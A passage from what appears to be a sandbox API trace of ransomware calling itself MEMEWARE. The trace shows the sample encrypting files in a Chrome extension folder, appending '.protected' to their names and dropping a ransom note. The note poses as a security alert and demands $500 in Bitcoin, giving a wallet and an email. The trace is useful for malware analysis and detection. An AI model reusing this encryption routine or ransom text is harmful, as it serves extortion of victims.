(lpString1="..", lpString2="System Volume Information") returned -1 [0078.922] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\..") returned 144 [0078.922] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.922] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.922] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.922] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.922] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.922] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.922] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.922] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.923] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.924] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.924] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.924] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json") returned 155 [0078.924] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.924] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.924] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.924] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.925] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.925] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.925] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.925] CloseHandle (hObject=0x168) returned 1 [0078.925] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.protected") returned 165 [0078.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\messages.json.protected")) returned 1 [0078.926] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.926] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.926] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt") returned 159 [0078.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.926] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.926] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.927] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.927] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.927] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.927] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.927] CloseHandle (hObject=0x164) returned 1 [0078.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.927] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0078.927] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0078.927] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0078.927] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0078.927] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0078.927] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned 141 [0078.927] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0078.927] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0078.927] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*") returned 143 [0078.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.928] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.928] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.928] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.928] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.928] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\.") returned 143 [0078.928] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.928] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.928] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.928] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.928] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.928] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\..") returned 144 [0078.928] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.928] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.928] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.928] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.928] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.929] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.929] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.929] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.929] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.930] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.930] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.930] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.930] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.930] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.930] CloseHandle (hObject=0x168) returned 1 [0078.930] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.protected") returned 165 [0078.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.protected")) returned 1 [0078.931] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.931] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.931] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0078.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.931] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.931] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.932] lstrlenA (lpString="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") returned 684 [0078.932] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.932] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.932] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0078.932] CloseHandle (hObject=0x164) returned 1 [0078.932] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.932] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0078.932] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0078.932] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0078.932] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0078.932] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0078.932] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned 141 [0078.932] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0078.932] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*") returned 143 [0078.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.933] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.933] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\.") returned 143 [0078.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.933] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.933] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.933] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.933] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.933] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\..") returned 144 [0078.933] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.933] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.933] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") 
